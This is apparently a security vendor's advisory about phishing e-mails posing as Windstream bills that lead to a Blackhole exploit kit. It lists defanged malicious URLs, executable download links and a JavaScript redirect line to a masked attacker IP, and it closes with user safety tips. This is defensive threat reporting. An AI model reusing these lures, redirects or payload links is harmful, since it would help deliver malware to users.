[Warning] Malicious e-mails disguised as e-bill are spreading

1. Introduction

INCA Internet response team detected malicious e-mail disguised as Windstream service in Korea. Its title is "Your Windstream bill is available for viewing". It doesn't contain attachment; however, it has malicious link for trying to infect malicious file. It contains various malicious web sites, which is run by Blackhole Web Malware Exploitation Kit, attacker can monitor infection status and can attack with various exploits on real-time. Because there are a lot of malicious e-mails in Korea in these days, users need to be careful by these malicious e-mails.

- E-mail disguised as sent by Windstream

- No attachment, to induce user to click malicious URL

- Hard to detect due to various malicious web sites

- Being infected by just clicking

2. The body of malicious e-mail

[Warning] Malicious e-mails disguising as image file were found.

http://en-erteam.nprotect.com/2012/07/warning-malicious-e-mails-disguising-as.html

[Warning] Malicious personal message from fake LinkedIn friend

http://en-erteam.nprotect.com/2012/06/warning-malicious-personal-message-from.html

[Warning] Malicious file about portrait infringement 

http://en-erteam.nprotect.com/2012/05/warning-malicious-file-about-portrait.html

E-mail can be sent to uncertain users as following types. Its body contains various malicious URLs.

Title : Your Windstream bill is available for viewing

Its body contains various malicious URLs.

hxxp://kocaeliyuz****.com/XRVTGJvu/index.html?s=883&lid=2324&elq=11f7b1b5179f45b09737bdf10d0fe61f

hxxp://findingaplu****.com/cousfaek/index.html?s=883&lid=2325&elq=11f7b1b5179f45b09737bdf10d0fe61f

hxxp://glassdirec****.com.au/8t6d37YU/index.html?s=883&lid=2325&elq=11f7b1b5179f45b09737bdf10d0fe61f

hxxp://miespaciopil****.com/5AWZcNGb/index.html?s=883&lid=2327&elq=11f7b1b5179f45b09737bdf10d0fe61f

hxxp://radiog****.net/8t6d37YU/index.html?s=883&lid=2328&elq=11f7b1b5179f45b09737bdf10d0fe61f

hxxp://seven****.co.za/Zb2s9AuQ/index.html?s=883&lid=2328&elq=11f7b1b5179f45b09737bdf10d0fe61f

Upon clicking link, it will redirect browser to malicious web site and will be exposed by various exploits.

Web site shows following image due to js.js, installs various malicious files and redirects to normal msn.com.

hxxp://ican****.co.uk/wvGCntXp/js.js
hxxp://www.camargotur****.com.br/9jNMTCoL/js.js

js.js contains following contents.

document.location='http://184.***.**.237/search.php?q=fa16f5d3def51288';

It tries to install with using Adobe Flash Player, JAVA exploit.

hxxp://184.***.**.237/data/ap2.php

hxxp://akradugunsalo*****.com/k0g2Cgr9/nn4hWpH.exe
hxxp://annonceagr*****.com/eud7io3A/M13ZGPt.exe

This malicious file tries to access certain site by injected code on explorer.exe.
It can be worked by C&C(Command and Control).

Besides, attacker can monitor infected PCs and can control.

3. Summary

Recently, this kind of technique, inducing user to click type, is prevalent in Korea. Therefore, users need to be careful on using internet. To use PC safely from security threats of these malicious attachments, we recommend you download latest security updates and obey following "Security management tips" for general users.

Security management tips

1. Maintain the latest security update on OS and applications
2. Use anti-virus SW from believable security company and keep updating the latest engine and using real time detecting function
3. Do not see and download attached file from suspicious e-mail.
4. Keep caution to link from instant messenger and SNS.

INCA Internet (Security Response Center / Emergency Response Team) runs responding system against various security threats.